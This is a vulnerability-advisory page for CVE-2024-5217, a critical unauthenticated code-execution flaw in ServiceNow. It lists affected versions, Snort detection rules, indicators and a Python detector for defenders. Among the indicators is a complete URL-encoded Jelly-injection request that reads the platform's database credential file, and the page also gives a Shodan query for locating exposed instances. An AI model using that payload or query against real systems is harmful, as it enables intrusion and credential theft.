CVE-2024-5217
published 2024-07-10


Priority: P197 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2024-08-19
Exploited in the wild
EPSS: 99.63% (99.9th percentile)

ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

Affected

16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| servicenow | now_platform | < Utah Patch 10 Hot Fix 3 | Utah Patch 10 Hot Fix 3 |
| servicenow | now_platform | < Utah Patch 10a Hot Fix 2 | Utah Patch 10a Hot Fix 2 |
| servicenow | now_platform | < Utah Patch 10b Hot Fix 1 | Utah Patch 10b Hot Fix 1 |
| servicenow | now_platform | < Vancouver Patch 6 Hot Fix 2 | Vancouver Patch 6 Hot Fix 2 |
| servicenow | now_platform | < Vancouver Patch 7 Hot Fix 3b | Vancouver Patch 7 Hot Fix 3b |
| servicenow | now_platform | < Vancouver Patch 8 Hot Fix 4 | Vancouver Patch 8 Hot Fix 4 |
| servicenow | now_platform | < Vancouver Patch 9 Hot Fix 1 | Vancouver Patch 9 Hot Fix 1 |
| servicenow | now_platform | < Vancouver Patch 10 | Vancouver Patch 10 |
| servicenow | now_platform | < Washington DC Patch 1 Hot Fix 3b | Washington DC Patch 1 Hot Fix 3b |
| servicenow | now_platform | < Washington DC Patch 2 Hot Fix 2 | Washington DC Patch 2 Hot Fix 2 |
| servicenow | now_platform | < Washington DC Patch 3 Hot Fix 2 | Washington DC Patch 3 Hot Fix 2 |
| servicenow | now_platform | < Washington DC Patch 4 | Washington DC Patch 4 |
| servicenow | now_platform | < Washington DC Patch 5 | Washington DC Patch 5 |
| servicenow | servicenow | | |
| servicenow | servicenow | | |
| servicenow | servicenow | | |

Detection & IOCs (extracted from sources)

url/login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E
path/login.do
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/login.do"; startswith; content:"jvar_page_title|3d|"; distance:0; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; content:"j|3a|jelly|20|xmlns|3a|j|3d 22|jelly|3a|core|22 20|xmlns|3a|g|3d 27|glide|27|"; within:80; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060429; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets GET /login.do with jvar_page_title parameter containing URL-encoded Jelly template injection (<j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>...) to achieve unauthenticated RCE. Look for this parameter in HTTP GET requests to /login.do.
  • POST variant also observed: attacker POSTs to /login.do with jvar_page_title= in the request body containing javascript or style tags. Monitor POST body for 'jvar_page_title=' combined with 'javascript' or 'style' keywords.
  • Successful exploitation response contains the string 'glide.db.user' in the HTTP response body, indicating database credential file (glide.db.properties) was read. Use this as a response-side detection indicator.
  • Exploitation involves a two-stage payload: first stage checks for a specific result in the server response, second stage checks database contents and dumps user lists and account credentials (often hashed, sometimes plaintext).
  • CVE-2024-5217 is chained with CVE-2024-4879 and CVE-2024-5178 for full database access. Detections for any one of these three CVEs should trigger investigation for the others.
  • Use Shodan query http.favicon.hash:"1701804003" or FOFA query icon_hash=1701804003 to enumerate internet-exposed ServiceNow instances for attack surface mapping.
  • The vulnerability is in the GlideExpression script component. Monitor for Jelly template syntax (j:jelly, g:evaluate, xmlns:j="jelly:core") appearing in any HTTP parameter on ServiceNow endpoints.
  • ServiceNow-hosted (SaaS) instances received fixes earlier on May 14, 2024, before the June/July 2024 patch cycle. Self-hosted/on-premises instances require manual patching. Verify patch status per deployment type.
  • Affected platform versions include Utah, Vancouver, and Washington DC Now Platform releases. Ensure patching covers all three named release trains.
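
The request-side and response-side checks from the notes above, as an added example that is not part of the original page or of any vendor tooling. It decodes nested percent-encoding before matching, flags Jelly syntax in any parameter on any endpoint, and applies the rules' `javascript`/`style` keyword check to `jvar_page_title` on `/login.do`; the function names, reason labels and sample requests are constructed for illustration, and the sample markup carries an inert placeholder body.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus, quote

# Jelly template syntax named in the detection notes (any parameter, any endpoint).
JELLY = re.compile(r"j:jelly|g:evaluate|xmlns:j\s*=\s*[\"']jelly:core", re.I)
# Keywords the two ET rules look for after jvar_page_title= on /login.do.
TAGS = re.compile(r"javascript|style", re.I)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded input is still matched."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(method, uri, body=""):
    """Return sorted (parameter, reason) findings for one HTTP request."""
    parts = urlsplit(uri)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        params += parse_qsl(body, keep_blank_values=True)
    findings = set()
    for name, value in params:
        value = fully_decode(value)
        if JELLY.search(value):
            findings.add((name, "jelly-template-syntax"))
        if parts.path == "/login.do" and name == "jvar_page_title" and TAGS.search(value):
            findings.add((name, "login.do-jvar_page_title-tag"))
    return sorted(findings)

def response_indicates_config_read(response_body):
    """Response-side indicator from the notes: 'glide.db.user' in the body."""
    return "glide.db.user" in response_body

# Constructed sample: marker syntax only, with an inert placeholder body.
MARKUP = ('<style><j:jelly xmlns:j="jelly:core" xmlns:g=\'glide\'>'
          "<g:evaluate>PLACEHOLDER</g:evaluate></j:jelly></style>")
ENCODED = quote(MARKUP, safe="")
DOUBLE_ENCODED = quote(ENCODED, safe="")

if __name__ == "__main__":
    samples = [("GET", "/login.do?user_name=alice", ""),
               ("GET", "/login.do?jvar_page_title=" + ENCODED, ""),
               ("GET", "/login.do?jvar_page_title=" + DOUBLE_ENCODED, ""),
               ("POST", "/login.do", "jvar_page_title=" + ENCODED),
               ("GET", "/some_page.do?q=" + ENCODED, "")]
    for method, uri, body in samples:
        print(method, uri[:40], inspect_request(method, uri, body))
```

The `style` keyword check inherits the rules' breadth, so a benign page title containing that word on `/login.do` will also be flagged; treat that finding as a triage signal and the Jelly-syntax finding as the stronger one.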

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v4.0 | 9.2 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
| cisa | | 9.2 | CRITICAL | |